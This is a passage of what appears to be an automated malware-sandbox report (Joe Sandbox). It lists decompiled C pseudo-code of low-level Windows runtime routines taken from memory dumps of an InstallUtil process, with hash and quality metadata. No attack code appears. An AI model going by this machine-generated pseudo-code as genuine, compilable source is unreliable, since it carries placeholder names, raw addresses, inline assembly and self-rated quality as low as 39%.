                      				_push(0x400);
                      				_t102 =  &_v1036;
                      				_push(_t102);
                      				_push(2);
                      				_push( &_v1048);
                      				_push(_t116);
                      				_t122 = E01309650();
                      				if(_t122 >= 0) {
                      					__eflags = 0;
                      					_v1052 = 0;
                      					goto L7;
                      				}
                      				if(_t122 == 0x80000005) {
                      					goto L18;
                      				}
                      				goto L4;
                      			}


                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 035c7657f6938f156c8c0b79cf67359e21756ae032bca983422995f01c4562d7
                      • Instruction ID: c973a94c5d110b43e9634dc84aa5cbbb13da93cefdea955d088fb622cf5e88a9
                      • Opcode Fuzzy Hash: 035c7657f6938f156c8c0b79cf67359e21756ae032bca983422995f01c4562d7
                      • Instruction Fuzzy Hash: 9881B3B56142068FEB2ACE58C880F3A77E8EBC4358F14491EEE458B751D330DD41CBAA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 39%
                      			E0135B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                      				char _v8;
                      				signed int _v12;
                      				signed int _t80;
                      				signed int _t83;
                      				intOrPtr _t89;
                      				signed int _t92;
                      				signed char _t106;
                      				signed int* _t107;
                      				intOrPtr _t108;
                      				intOrPtr _t109;
                      				signed int _t114;
                      				void* _t115;
                      				void* _t117;
                      				void* _t119;
                      				void* _t122;
                      				signed int _t123;
                      				signed int* _t124;
                      
                      				_t106 = _a12;
                      				if((_t106 & 0xfffffffc) != 0) {
                      					return 0xc000000d;
                      				}
                      				if((_t106 & 0x00000002) != 0) {
                      					_t106 = _t106 | 0x00000001;
                      				}
                      				_t109 =  *0x13b7b9c; // 0x0
                      				_t124 = L012E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                      				if(_t124 != 0) {
                      					 *_t124 =  *_t124 & 0x00000000;
                      					_t124[1] = _t124[1] & 0x00000000;
                      					_t124[4] = _t124[4] & 0x00000000;
                      					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                      						L13:
                      						_push(_t124);
                      						if((_t106 & 0x00000002) != 0) {
                      							_push(0x200);
                      							_push(0x28);
                      							_push(0xffffffff);
                      							_t122 = E01309800();
                      							if(_t122 < 0) {
                      								L33:
                      								if((_t124[4] & 0x00000001) != 0) {
                      									_push(4);
                      									_t64 =  &(_t124[1]); // 0x4
                      									_t107 = _t64;
                      									_push(_t107);
                      									_push(5);
                      									_push(0xfffffffe);
                      									E013095B0();
                      									if( *_t107 != 0) {
                      										_push( *_t107);
                      										E013095D0();
                      									}
                      								}
                      								_push(_t124);
                      								_push(0);
                      								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                      								L37:
                      								L012E77F0();
                      								return _t122;
                      							}
                      							_t124[4] = _t124[4] | 0x00000002;
                      							L18:
                      							_t108 = _a8;
                      							_t29 =  &(_t124[0x105]); // 0x414
                      							_t80 = _t29;
                      							_t30 =  &(_t124[5]); // 0x14
                      							_t124[3] = _t80;
                      							_t123 = 0;
                      							_t124[2] = _t30;
                      							 *_t80 = _t108;
                      							if(_t108 == 0) {
                      								L21:
                      								_t112 = 0x400;
                      								_push( &_v8);
                      								_v8 = 0x400;
                      								_push(_t124[2]);
                      								_push(0x400);
                      								_push(_t124[3]);
                      								_push(0);
                      								_push( *_t124);
                      								_t122 = E01309910();
                      								if(_t122 != 0xc0000023) {
                      									L26:
                      									if(_t122 != 0x106) {
                      										L40:
                      										if(_t122 < 0) {
                      											L29:
                      											_t83 = _t124[2];
                      											if(_t83 != 0) {
                      												_t59 =  &(_t124[5]); // 0x14
                      												if(_t83 != _t59) {
                      													L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                      												}
                      											}
                      											_push( *_t124);
                      											E013095D0();
                      											goto L33;
                      										}
                      										 *_a16 = _t124;
                      										return 0;
                      									}
                      									if(_t108 != 1) {
                      										_t122 = 0;
                      										goto L40;
                      									}
                      									_t122 = 0xc0000061;
                      									goto L29;
                      								} else {
                      									goto L22;
                      								}
                      								while(1) {
                      									L22:
                      									_t89 =  *0x13b7b9c; // 0x0
                      									_t92 = L012E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                      									_t124[2] = _t92;
                      									if(_t92 == 0) {
                      										break;
                      									}
                      									_t112 =  &_v8;
                      									_push( &_v8);
                      									_push(_t92);
                      									_push(_v8);
                      									_push(_t124[3]);
                      									_push(0);
                      									_push( *_t124);
                      									_t122 = E01309910();
                      									if(_t122 != 0xc0000023) {
                      										goto L26;
                      									}
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                      								}
                      								_t122 = 0xc0000017;
                      								goto L26;
                      							}
                      							_t119 = 0;
                      							do {
                      								_t114 = _t124[3];
                      								_t119 = _t119 + 0xc;
                      								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                      								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                      								_t123 = _t123 + 1;
                      								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                      							} while (_t123 < _t108);
                      							goto L21;
                      						}
                      						_push(0x28);
                      						_push(3);
                      						_t122 = E012CA7B0();
                      						if(_t122 < 0) {
                      							goto L33;
                      						}
                      						_t124[4] = _t124[4] | 0x00000001;
                      						goto L18;
                      					}
                      					if((_t106 & 0x00000001) == 0) {
                      						_t115 = 0x28;
                      						_t122 = E0135E7D3(_t115, _t124);
                      						if(_t122 < 0) {
                      							L9:
                      							_push(_t124);
                      							_push(0);
                      							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                      							goto L37;
                      						}
                      						L12:
                      						if( *_t124 != 0) {
                      							goto L18;
                      						}
                      						goto L13;
                      					}
                      					_t15 =  &(_t124[1]); // 0x4
                      					_t117 = 4;
                      					_t122 = E0135E7D3(_t117, _t15);
                      					if(_t122 >= 0) {
                      						_t124[4] = _t124[4] | 0x00000001;
                      						_v12 = _v12 & 0x00000000;
                      						_push(4);
                      						_push( &_v12);
                      						_push(5);
                      						_push(0xfffffffe);
                      						E013095B0();
                      						goto L12;
                      					}
                      					goto L9;
                      				} else {
                      					return 0xc0000017;
                      				}
                      			}





















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1b054fff3aee8d874066e987d72683d0cb5fbb1621bae272e39ae8c5f913c4f
                      • Instruction ID: b832fc79b41e5d65fd7b8af6e3fcb948de64954e253ab52e5df33c69a0bbea8c
                      • Opcode Fuzzy Hash: c1b054fff3aee8d874066e987d72683d0cb5fbb1621bae272e39ae8c5f913c4f
                      • Instruction Fuzzy Hash: E271FE32200706EFE7728F19C845F66BBF6EB40B28F154528EA598B6E5DB71E940CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E01346DC9(signed int __ecx, void* __edx) {
                      				unsigned int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				char _v36;
                      				char _v40;
                      				char _v44;
                      				char _v48;
                      				char _v52;
                      				char _v56;
                      				char _v60;
                      				void* _t87;
                      				void* _t95;
                      				signed char* _t96;
                      				signed int _t107;
                      				signed int _t136;
                      				signed char* _t137;
                      				void* _t157;
                      				void* _t161;
                      				void* _t167;
                      				intOrPtr _t168;
                      				void* _t174;
                      				void* _t175;
                      				signed int _t176;
                      				void* _t177;
                      
                      				_t136 = __ecx;
                      				_v44 = 0;
                      				_t167 = __edx;
                      				_v40 = 0;
                      				_v36 = 0;
                      				_v32 = 0;
                      				_v60 = 0;
                      				_v56 = 0;
                      				_v52 = 0;
                      				_v48 = 0;
                      				_v16 = __ecx;
                      				_t87 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                      				_t175 = _t87;
                      				if(_t175 != 0) {
                      					_t11 = _t175 + 0x30; // 0x30
                      					 *((short*)(_t175 + 6)) = 0x14d4;
                      					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                      					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                      					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                      					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                      					E01346B4C(_t167, _t11, 0x214,  &_v8);
                      					_v12 = _v8 + 0x10;
                      					_t95 = E012E7D50();
                      					_t137 = 0x7ffe0384;
                      					if(_t95 == 0) {
                      						_t96 = 0x7ffe0384;
                      					} else {
                      						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      					}
                      					_push(_t175);
                      					_push(_v12);
                      					_push(0x402);
                      					_push( *_t96 & 0x000000ff);
                      					E01309AE0();
                      					_t87 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                      					_t176 = _v16;
                      					if((_t176 & 0x00000100) != 0) {
                      						_push( &_v36);
                      						_t157 = 4;
                      						_t87 = E0134795D( *((intOrPtr*)(_t167 + 8)), _t157);
                      						if(_t87 >= 0) {
                      							_v24 = E0134795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                      							_v28 = E0134795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                      							_push( &_v52);
                      							_t161 = 5;
                      							_t168 = E0134795D( *((intOrPtr*)(_t167 + 8)), _t161);
                      							_v20 = _t168;
                      							_t107 = L012E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                      							_v16 = _t107;
                      							if(_t107 != 0) {
                      								_v8 = _v8 & 0x00000000;
                      								 *(_t107 + 0x20) = _t176;
                      								 *((short*)(_t107 + 6)) = 0x14d5;
                      								_t47 = _t107 + 0x24; // 0x24
                      								_t177 = _t47;
                      								E01346B4C( &_v36, _t177, 0xc78,  &_v8);
                      								_t51 = _v8 + 4; // 0x4
                      								_t178 = _t177 + (_v8 >> 1) * 2;
                      								_v12 = _t51;
                      								E01346B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                      								_v12 = _v12 + _v8;
                      								E01346B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                      								_t125 = _v8;
                      								_v12 = _v12 + _v8;
                      								E01346B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                      								_t174 = _v12 + _v8;
                      								if(E012E7D50() != 0) {
                      									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      								}
                      								_push(_v16);
                      								_push(_t174);
                      								_push(0x402);
                      								_push( *_t137 & 0x000000ff);
                      								E01309AE0();
                      								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                      								_t168 = _v20;
                      							}
                      							_t87 = L012E2400( &_v36);
                      							if(_v24 >= 0) {
                      								_t87 = L012E2400( &_v44);
                      							}
                      							if(_t168 >= 0) {
                      								_t87 = L012E2400( &_v52);
                      							}
                      							if(_v28 >= 0) {
                      								return L012E2400( &_v60);
                      							}
                      						}
                      					}
                      				}
                      				return _t87;
                      			}
































                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                      • Instruction ID: 8c75664ae6c1d853848036535b4a763d5eb31f7a29f55ec73759f727b1b25a8f
                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                      • Instruction Fuzzy Hash: 96716CB1A0020AEFDB11DFA9C984EEEBBF9FF48714F144169E505E7250DB30AA41CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                      				signed short* _v8;
                      				signed short* _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				short _t56;
                      				signed int _t57;
                      				intOrPtr _t58;
                      				signed short* _t61;
                      				intOrPtr _t72;
                      				intOrPtr _t75;
                      				intOrPtr _t84;
                      				intOrPtr _t87;
                      				intOrPtr* _t90;
                      				signed short* _t91;
                      				signed int _t95;
                      				signed short* _t96;
                      				intOrPtr _t97;
                      				intOrPtr _t102;
                      				signed int _t108;
                      				intOrPtr _t110;
                      				signed int _t111;
                      				signed short* _t112;
                      				void* _t113;
                      				signed int _t116;
                      				signed short** _t119;
                      				short* _t120;
                      				signed int _t123;
                      				signed int _t124;
                      				void* _t125;
                      				intOrPtr _t127;
                      				signed int _t128;
                      
                      				_t90 = __ecx;
                      				_v16 = __edx;
                      				_t108 = _a4;
                      				_v28 = __ecx;
                      				_t4 = _t108 - 1; // -1
                      				if(_t4 > 0x13) {
                      					L15:
                      					_t56 = 0xc0000100;
                      					L16:
                      					return _t56;
                      				}
                      				_t57 = _t108 * 0x1c;
                      				_v32 = _t57;
                      				_t6 = _t57 + 0x13b8204; // 0x0
                      				_t123 =  *_t6;
                      				_t7 = _t57 + 0x13b8208; // 0x13b8207
                      				_t8 = _t57 + 0x13b8208; // 0x13b8207
                      				_t119 = _t8;
                      				_v36 = _t123;
                      				_t110 = _t7 + _t123 * 8;
                      				_v24 = _t110;
                      				_t111 = _a4;
                      				if(_t119 >= _t110) {
                      					L12:
                      					if(_t123 != 3) {
                      						_t58 =  *0x13b8450; // 0x0
                      						if(_t58 == 0) {
                      							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                      						}
                      					} else {
                      						_t26 = _t57 + 0x13b821c; // 0x0
                      						_t58 =  *_t26;
                      					}
                      					 *_t90 = _t58;
                      					goto L15;
                      				} else {
                      					goto L2;
                      				}
                      				while(1) {
                      					_t116 =  *_t61 & 0x0000ffff;
                      					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                      					if(_t116 == _t128) {
                      						goto L18;
                      					}
                      					L5:
                      					if(_t116 >= 0x61) {
                      						if(_t116 > 0x7a) {
                      							_t97 =  *0x13b6d5c; // 0x7fb00654
                      							_t72 =  *0x13b6d5c; // 0x7fb00654
                      							_t75 =  *0x13b6d5c; // 0x7fb00654
                      							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                      						} else {
                      							_t116 = _t116 - 0x20;
                      						}
                      					}
                      					if(_t128 >= 0x61) {
                      						if(_t128 > 0x7a) {
                      							_t102 =  *0x13b6d5c; // 0x7fb00654
                      							_t84 =  *0x13b6d5c; // 0x7fb00654
                      							_t87 =  *0x13b6d5c; // 0x7fb00654
                      							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                      						} else {
                      							_t128 = _t128 - 0x20;
                      						}
                      					}
                      					if(_t116 == _t128) {
                      						_t61 = _v12;
                      						_t96 = _v8;
                      					} else {
                      						_t113 = _t116 - _t128;
                      						L9:
                      						_t111 = _a4;
                      						if(_t113 == 0) {
                      							_t115 =  &(( *_t119)[_t111 + 1]);
                      							_t33 =  &(_t119[1]); // 0x100
                      							_t120 = _a8;
                      							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                      							_t35 = _t95 - 1; // 0xff
                      							_t124 = _t35;
                      							if(_t120 == 0) {
                      								L27:
                      								 *_a16 = _t95;
                      								_t56 = 0xc0000023;
                      								goto L16;
                      							}
                      							if(_t124 >= _a12) {
                      								if(_a12 >= 1) {
                      									 *_t120 = 0;
                      								}
                      								goto L27;
                      							}
                      							 *_a16 = _t124;
                      							_t125 = _t124 + _t124;
                      							E0130F3E0(_t120, _t115, _t125);
                      							_t56 = 0;
                      							 *((short*)(_t125 + _t120)) = 0;
                      							goto L16;
                      						}
                      						_t119 =  &(_t119[2]);
                      						if(_t119 < _v24) {
                      							L2:
                      							_t91 =  *_t119;
                      							_t61 = _t91;
                      							_v12 = _t61;
                      							_t112 =  &(_t61[_t111]);
                      							_v8 = _t112;
                      							if(_t61 >= _t112) {
                      								break;
                      							} else {
                      								_t127 = _v16 - _t91;
                      								_t96 = _t112;
                      								_v20 = _t127;
                      								_t116 =  *_t61 & 0x0000ffff;
                      								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                      								if(_t116 == _t128) {
                      									goto L18;
                      								}
                      								goto L5;
                      							}
                      						} else {
                      							_t90 = _v28;
                      							_t57 = _v32;
                      							_t123 = _v36;
                      							goto L12;
                      						}
                      					}
                      					L18:
                      					_t61 =  &(_t61[1]);
                      					_v12 = _t61;
                      					if(_t61 >= _t96) {
                      						break;
                      					}
                      					_t127 = _v20;
                      				}
                      				_t113 = 0;
                      				goto L9;
                      			}







































                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ddfd094351e9277c52d3fee827cae0be5ab0a8e695289df2c0885eda1d28ef9c
                      • Instruction ID: 778527a73a2e038713042e09ac364bcf19512d60e9ccba664b3a3bf7f19cd768
                      • Opcode Fuzzy Hash: ddfd094351e9277c52d3fee827cae0be5ab0a8e695289df2c0885eda1d28ef9c
                      • Instruction Fuzzy Hash: 5551B076A20119CFCB14CF1CC491ABDB7B5FB89700B16846EEE46AB355E734EA41CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E0138AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                      				signed int _v8;
                      				signed int _v12;
                      				void* __esi;
                      				void* __ebp;
                      				signed short* _t36;
                      				signed int _t41;
                      				char* _t42;
                      				intOrPtr _t43;
                      				signed int _t47;
                      				void* _t52;
                      				signed int _t57;
                      				intOrPtr _t61;
                      				signed char _t62;
                      				signed int _t72;
                      				signed char _t85;
                      				signed int _t88;
                      
                      				_t73 = __edx;
                      				_push(__ecx);
                      				_t85 = __ecx;
                      				_v8 = __edx;
                      				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                      				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                      				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                      					_t57 = _t57 | 0x00000001;
                      				}
                      				_t88 = 0;
                      				_t36 = 0;
                      				_t96 = _a12;
                      				if(_a12 == 0) {
                      					_t62 = _a8;
                      					__eflags = _t62;
                      					if(__eflags == 0) {
                      						goto L12;
                      					}
                      					_t52 = E0138C38B(_t85, _t73, _t57, 0);
                      					_t62 = _a8;
                      					 *_t62 = _t52;
                      					_t36 = 0;
                      					goto L11;
                      				} else {
                      					_t36 = E0138ACFD(_t85, _t73, _t96, _t57, _a8);
                      					if(0 == 0 || 0 == 0xffffffff) {
                      						_t72 = _t88;
                      					} else {
                      						_t72 =  *0x00000000 & 0x0000ffff;
                      					}
                      					 *_a12 = _t72;
                      					_t62 = _a8;
                      					L11:
                      					_t73 = _v8;
                      					L12:
                      					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                      						L19:
                      						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                      							L22:
                      							_t74 = _v8;
                      							__eflags = _v8;
                      							if(__eflags != 0) {
                      								L25:
                      								__eflags = _t88 - 2;
                      								if(_t88 != 2) {
                      									__eflags = _t85 + 0x44 + (_t88 << 6);
                      									_t88 = E0138FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                      									goto L34;
                      								}
                      								L26:
                      								_t59 = _v8;
                      								E0138EA55(_t85, _v8, _t57);
                      								asm("sbb esi, esi");
                      								_t88 =  ~_t88;
                      								_t41 = E012E7D50();
                      								__eflags = _t41;
                      								if(_t41 == 0) {
                      									_t42 = 0x7ffe0380;
                      								} else {
                      									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      								}
                      								__eflags =  *_t42;
                      								if( *_t42 != 0) {
                      									_t43 =  *[fs:0x30];
                      									__eflags =  *(_t43 + 0x240) & 0x00000001;
                      									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                      										__eflags = _t88;
                      										if(_t88 != 0) {
                      											E01381608(_t85, _t59, 3);
                      										}
                      									}
                      								}
                      								goto L34;
                      							}
                      							_push(_t62);
                      							_t47 = E01391536(0x13b8ae4, (_t74 -  *0x13b8b04 >> 0x14) + (_t74 -  *0x13b8b04 >> 0x14), _t88, __eflags);
                      							__eflags = _t47;
                      							if(_t47 == 0) {
                      								goto L26;
                      							}
                      							_t74 = _v12;
                      							_t27 = _t47 - 1; // -1
                      							_t88 = _t27;
                      							goto L25;
                      						}
                      						_t62 = _t85;
                      						if(L0138C323(_t62, _v8, _t57) != 0xffffffff) {
                      							goto L22;
                      						}
                      						_push(_t62);
                      						_push(_t88);
                      						E0138A80D(_t85, 9, _v8, _t88);
                      						goto L34;
                      					} else {
                      						_t101 = _t36;
                      						if(_t36 != 0) {
                      							L16:
                      							if(_t36 == 0xffffffff) {
                      								goto L19;
                      							}
                      							_t62 =  *((intOrPtr*)(_t36 + 2));
                      							if((_t62 & 0x0000000f) == 0) {
                      								goto L19;
                      							}
                      							_t62 = _t62 & 0xf;
                      							if(E0136CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                      								L34:
                      								return _t88;
                      							}
                      							goto L19;
                      						}
                      						_t62 = _t85;
                      						_t36 = E0138ACFD(_t62, _t73, _t101, _t57, _t62);
                      						if(_t36 == 0) {
                      							goto L19;
                      						}
                      						goto L16;
                      					}
                      				}
                      			}

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4e155dc738fd533af040f6207aaf4c4349f564248c626637791cc386492c9f31
                      • Instruction ID: 0999e850dd4f39f05870258f7747b5b809a7ee1fc57d15096c95aafad44bc66b
                      • Opcode Fuzzy Hash: 4e155dc738fd533af040f6207aaf4c4349f564248c626637791cc386492c9f31
                      • Instruction Fuzzy Hash: CA4117B17043119BE726EB2DCC84B3BBB99EF84628F04461AF95AC76D0D774E805D690
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E012EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                      				char _v5;
                      				signed int _v12;
                      				signed int* _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				void* __ebx;
                      				void* __edi;
                      				signed int _t54;
                      				char* _t58;
                      				signed int _t66;
                      				intOrPtr _t67;
                      				intOrPtr _t68;
                      				intOrPtr _t72;
                      				intOrPtr _t73;
                      				signed int* _t75;
                      				intOrPtr _t79;
                      				intOrPtr _t80;
                      				char _t82;
                      				signed int _t83;
                      				signed int _t84;
                      				signed int _t88;
                      				signed int _t89;
                      				intOrPtr _t90;
                      				intOrPtr _t92;
                      				signed int _t97;
                      				intOrPtr _t98;
                      				intOrPtr* _t99;
                      				signed int* _t101;
                      				signed int* _t102;
                      				intOrPtr* _t103;
                      				intOrPtr _t105;
                      				signed int _t106;
                      				void* _t118;
                      
                      				_t92 = __edx;
                      				_t75 = _a4;
                      				_t98 = __ecx;
                      				_v44 = __edx;
                      				_t106 = _t75[1];
                      				_v40 = __ecx;
                      				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                      					_t82 = 0;
                      				} else {
                      					_t82 = 1;
                      				}
                      				_v5 = _t82;
                      				_t6 = _t98 + 0xc8; // 0xc9
                      				_t101 = _t6;
                      				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                      				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                      				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                      				if(_t82 != 0) {
                      					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                      					_t83 =  *_t75;
                      					_t54 = _t75[1];
                      					 *_t101 = _t83;
                      					_t84 = _t83 | _t54;
                      					_t101[1] = _t54;
                      					if(_t84 == 0) {
                      						_t101[1] = _t101[1] & _t84;
                      						 *_t101 = 1;
                      					}
                      					goto L19;
                      				} else {
                      					if(_t101 == 0) {
                      						E012CCC50(E012C4510(0xc000000d));
                      						_t88 =  *_t101;
                      						_t97 = _t101[1];
                      						L15:
                      						_v12 = _t88;
                      						_t66 = _t88 -  *_t75;
                      						_t89 = _t97;
                      						asm("sbb ecx, [ebx+0x4]");
                      						_t118 = _t89 - _t97;
                      						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                      							_t66 = _t66 | 0xffffffff;
                      							_t89 = 0x7fffffff;
                      						}
                      						 *_t101 = _t66;
                      						_t101[1] = _t89;
                      						L19:
                      						if(E012E7D50() != 0) {
                      							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      						} else {
                      							_t58 = 0x7ffe0386;
                      						}
                      						_t102 = _v16;
                      						if( *_t58 != 0) {
                      							_t58 = E01398ED6(_t102, _t98);
                      						}
                      						_t76 = _v44;
                      						E012E2280(_t58, _v44);
                      						E012EDD82(_v44, _t102, _t98);
                      						E012EB944(_t102, _v5);
                      						return E012DFFB0(_t76, _t98, _t76);
                      					}
                      					_t99 = 0x7ffe03b0;
                      					do {
                      						_t103 = 0x7ffe0010;
                      						do {
                      							_t67 =  *0x13b8628; // 0x0
                      							_v28 = _t67;
                      							_t68 =  *0x13b862c; // 0x0
                      							_v32 = _t68;
                      							_v24 =  *((intOrPtr*)(_t99 + 4));
                      							_v20 =  *_t99;
                      							while(1) {
                      								_t97 =  *0x7ffe000c;
                      								_t90 =  *0x7FFE0008;
                      								if(_t97 ==  *_t103) {
                      									goto L10;
                      								}
                      								asm("pause");
                      							}
                      							L10:
                      							_t79 = _v24;
                      							_t99 = 0x7ffe03b0;
                      							_v12 =  *0x7ffe03b0;
                      							_t72 =  *0x7FFE03B4;
                      							_t103 = 0x7ffe0010;
                      							_v36 = _t72;
                      						} while (_v20 != _v12 || _t79 != _t72);
                      						_t73 =  *0x13b8628; // 0x0
                      						_t105 = _v28;
                      						_t80 =  *0x13b862c; // 0x0
                      					} while (_t105 != _t73 || _v32 != _t80);
                      					_t98 = _v40;
                      					asm("sbb edx, [ebp-0x20]");
                      					_t88 = _t90 - _v12 - _t105;
                      					_t75 = _a4;
                      					asm("sbb edx, eax");
                      					_t31 = _t98 + 0xc8; // 0x138fb53
                      					_t101 = _t31;
                      					 *_t101 = _t88;
                      					_t101[1] = _t97;
                      					goto L15;
                      				}
                      			}

